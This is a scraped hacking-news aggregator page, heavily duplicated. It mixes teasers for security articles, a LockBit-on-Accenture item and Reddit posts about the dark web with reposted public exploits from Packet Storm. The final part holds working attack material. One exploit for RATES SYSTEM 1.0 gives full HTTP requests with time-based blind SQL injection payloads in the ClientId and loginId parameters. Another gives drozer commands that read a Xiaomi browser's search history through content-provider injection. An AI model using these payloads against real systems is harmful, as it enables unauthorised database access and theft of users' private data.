Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Making security training fun with Cassie Clark
https://cdn-images-1.medium.com/max/2449/0*VbIeIT4Onp0wPnn_
Sources and Sinks interviews security awareness training expert, Cassie Clark
Continue reading on ShiftLeft Blog »
___________________________
@hacking_Attack
@Hacking_Video
Making security training fun with Cassie Clark
https://cdn-images-1.medium.com/max/2449/0*VbIeIT4Onp0wPnn_
Sources and Sinks interviews security awareness training expert, Cassie Clark
Continue reading on ShiftLeft Blog »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Making security training fun with Cassie Clark
Sources and Sinks interviews security awareness training expert, Cassie Clark
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Accenture afectado por el ransomware LockBit.
https://cdn-images-1.medium.com/max/962/0*Bf_ITIkAhuBRNKHl
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Accenture afectado por el ransomware LockBit.
https://cdn-images-1.medium.com/max/962/0*Bf_ITIkAhuBRNKHl
POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Accenture afectado por el ransomware LockBit.
POR EHACKING
Deep Web
What do you need in this days
Guys im gona make some websites on darkweb and i dont knkw what should i make. Thats why im gona ask you what do you need? What makes you to feel fredom? What do you want to do but you cant because you fair from goverment? Lets just talk about it
submitted by /u/arshiasohrabi
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
What do you need in this days
Guys im gona make some websites on darkweb and i dont knkw what should i make. Thats why im gona ask you what do you need? What makes you to feel fredom? What do you want to do but you cant because you fair from goverment? Lets just talk about it
submitted by /u/arshiasohrabi
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
What do you need in this days
Guys im gona make some websites on darkweb and i dont knkw what should i make. Thats why im gona ask you what do you need? What makes you to...
Deep Web
What do you need in this days
Guys im gona make some websites on darkweb and i dont knkw what should i make. Thats why im gona ask you what do you need? What makes you to feel fredom? What do you want to do but you cant because you fair from goverment? Lets just talk about it
submitted by /u/arshiasohrabi
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
What do you need in this days
Guys im gona make some websites on darkweb and i dont knkw what should i make. Thats why im gona ask you what do you need? What makes you to feel fredom? What do you want to do but you cant because you fair from goverment? Lets just talk about it
submitted by /u/arshiasohrabi
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
What do you need in this days
Guys im gona make some websites on darkweb and i dont knkw what should i make. Thats why im gona ask you what do you need? What makes you to...
Deep Web
What really is in the deep web?
I know the basics of what is deep web but don’t know anything about tor, onion etc. stuff. I watched a youtube video about silk road and went on a video marathon about dark web but all I can find is fear mongering. Mostly just about videos that you shouldn’t watch showing clips of random videos of something ominous looking with quality being that of a 2010 flip phone camera. What really is in the deep web? I know it’s not only illegal stuff but how much of it is? Is it really like the popular opinion seems to suggest?
submitted by /u/Trash_man66
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
What really is in the deep web?
I know the basics of what is deep web but don’t know anything about tor, onion etc. stuff. I watched a youtube video about silk road and went on a video marathon about dark web but all I can find is fear mongering. Mostly just about videos that you shouldn’t watch showing clips of random videos of something ominous looking with quality being that of a 2010 flip phone camera. What really is in the deep web? I know it’s not only illegal stuff but how much of it is? Is it really like the popular opinion seems to suggest?
submitted by /u/Trash_man66
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
What really is in the deep web?
I know the basics of what is deep web but don’t know anything about tor, onion etc. stuff. I watched a youtube video about silk road and went on a...
WAF bypasses: Tearing down the wall
https://infosecwriteups.com/waf-bypasses-tearing-down-the-wall-d08fd0f8374a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://infosecwriteups.com/waf-bypasses-tearing-down-the-wall-d08fd0f8374a?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
WAF bypasses: Tearing down the wall
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…Continue reading on InfoSec Write-ups » (https://infosecwriteups.com/waf-bypasses-tearing-down-the-wall-d08fd0f8374a?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
WAF bypasses: Tearing down the wall
Before we go deep into the ACTUAL bypasses section, It’s really important to understand what is a WAF(Web application firewall) and it’s…
How I collected sensitive data from examination software?
https://infosecwriteups.com/how-i-collected-sensitive-data-from-examination-software-f0795096af0e?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://infosecwriteups.com/how-i-collected-sensitive-data-from-examination-software-f0795096af0e?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I collected sensitive data from examination software?
Hey Guyz! I am back with a new vulnerability on a college website.
Hey Guyz! I am back with a new vulnerability on a college website.Continue reading on InfoSec Write-ups » (https://infosecwriteups.com/how-i-collected-sensitive-data-from-examination-software-f0795096af0e?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How I collected sensitive data from examination software?
Hey Guyz! I am back with a new vulnerability on a college website.
Exploit Collector
Atlassian Crowd pdkinstall Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Atlassian Crowd pdkinstall Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Atlassian Crowd pdkinstall Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
RATES SYSTEM 1.0 SQL Injection
https://3.bp.blogspot.com/-ZdpKmdYlHbY/WWlu_uhv-yI/AAAAAAAAIKA/GrhbPhfNXpolamaXsSLRo9Cb0FKriXUgQCLcBGAs/s1600/h12.png
RATES SYSTEM version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
RATES SYSTEM 1.0 SQL Injection
https://3.bp.blogspot.com/-ZdpKmdYlHbY/WWlu_uhv-yI/AAAAAAAAIKA/GrhbPhfNXpolamaXsSLRo9Cb0FKriXUgQCLcBGAs/s1600/h12.png
RATES SYSTEM version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
d472f87d486080efe5d62e3a79b12767Download
# Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections
# Date: 11-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Software Link: https://www.sourcecodester.com/php/14904/rates-system.html
# Version: V1.0
# Category: Webapps
# Tested on: Linux/Windows
# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
# Vulnerable Request:
POST /register.php HTTP/1.1
Host: localhost
Content-Length: 70
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf
Connection: close
ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456®ister=
# Vulnerable Payload:
# Parameter: ClientId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=®ister=oQCR
--------------------------------------------------------------------------------------------------------------------------
# Vulnerable Request:
POST /passwordreset.php HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/passwordreset.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61
Connection: close
loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset=
# Vulnerable Payload:
# Parameter: loginId (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:
loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
RATES SYSTEM 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Xiaomi 10.2.4.g Information Disclosure
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Xiaomi browser version 10.2.4.g suffers from a browser search history disclosure vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Xiaomi 10.2.4.g Information Disclosure
https://4.bp.blogspot.com/-5kb4UTwsKkE/WWlvjussFoI/AAAAAAAAIQs/uqojaqb90NcMo4ROOoH-c5uvdKeDdbGswCLcBGAs/s1600/h94.png
Xiaomi browser version 10.2.4.g suffers from a browser search history disclosure vulnerability.
MD5 |
9dea490704dc2785ee1fa573e8494850Download
# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure
# Date: 27-Dec-2018
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.mi.com/us
# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/
# Version: 10.2.4.g
# Tested on: Tested in Android Version: 8.1.0
# CVE : CVE-2018-20523
*summary: *
Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user’s browser history.
*Vulnerable component:* com.android.browser.searchhistory
*Poc:*
adb forward tcp:31415 tcp:31415
drozer console connect
drozer > run app.provider.query
content://com.android.browser.searchhistory/searchhistory
*Blogpost:*
https://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Xiaomi 10.2.4.g Information Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.